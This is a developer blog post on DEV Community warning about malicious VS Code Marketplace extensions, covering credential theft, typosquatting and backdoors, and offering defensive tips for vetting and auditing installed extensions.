DEV Community

Cover image for Concerning Amounts of Malware in the VS Code Marketplace: What Microsoft’s Own Logs Reveal
Ishaan Agrawal
Ishaan Agrawal

Posted on

Concerning Amounts of Malware in the VS Code Marketplace: What Microsoft’s Own Logs Reveal

#security #productivity #programming #backend

If you are like me, your VS Code setup is a carefully curated collection of themes, linters, and productivity boosters. We trust the Visual Studio Marketplace to be a safe haven for tools that make our lives easier. But if you take a look under the hood at what is actually getting removed from the platform, the picture gets a lot uglier.

I recently went down a rabbit hole looking at the official list of removed extensions on GitHub, and it is a wake-up call for anyone who blindly clicks "Install."

The "Install First, Ask Questions Later" Problem

The way the Marketplace works is fundamentally based on a reactive model. Microsoft does have automated scans, but a staggering amount of malicious code only gets taken down after it has already been published and downloaded by unsuspecting developers.

When you look at the logs of removed extensions, you see a constant stream of entries flagged for things like:

  • Credential Theft: Extensions designed to scrape your .env files or SSH keys.
  • Typosquatting: Malicious clones of popular extensions like Prettier or ESLint that hope you won't notice a tiny misspelling in the name.
  • Remote Access: Plugins that open backdoors into your development environment.

Why This Matters to You

As developers, our machines are high-value targets. We have access to production servers, API keys, proprietary source code, and personal data. A single malicious extension has the same permissions as you do. It can read your files, track your keystrokes, and send your data to a remote server without you ever seeing a popup.

The scary part isn't just that these extensions exist. It is that they are actively making it onto the store, staying there for days or weeks, and only getting purged after the damage might already be done.

How to Protect Your Workflow

You don't have to stop using extensions, but you do need to stop treating the Marketplace like a curated app store where everything is vetted. Here is how I have changed my approach:

  1. Check the Publisher: Look for the "Verified" checkmark. If a popular tool is being published by a random account with no history, stay away.
  2. Verify the Numbers: If an extension claims to be a popular tool but only has 500 downloads while the real one has 5 million, you are looking at a typosquatting attempt.
  3. Audit Your List: Every few months, go through your installed extensions. If something hasn't been updated in years, maybe double-check its safety.
  4. Do a Deeper Scan: Since we know malicious code can bypass basic store filters, you need a more aggressive way to vet what you are installing. I suggest using a VS Code extension security analyzer. It will perform a deep security assessment by looking for obfuscated code, hidden network connections, and dangerous dependencies that standard checks often miss. That will give you a clear risk report before you let the code touch your machine.

Final Thoughts

The VS Code Marketplace is an incredible resource, but we have to stop assuming it is inherently safe. The "Removed Packages" list is proof that malware is constantly slipping through the cracks.

Take five minutes today to look at what you have installed. It is much better to spend a few minutes auditing your setup now than to spend a week dealing with a compromised machine later.

What's your take? Do you check the credentials of every extension you install, or do you just hit install and hope for the best?

Top comments (0)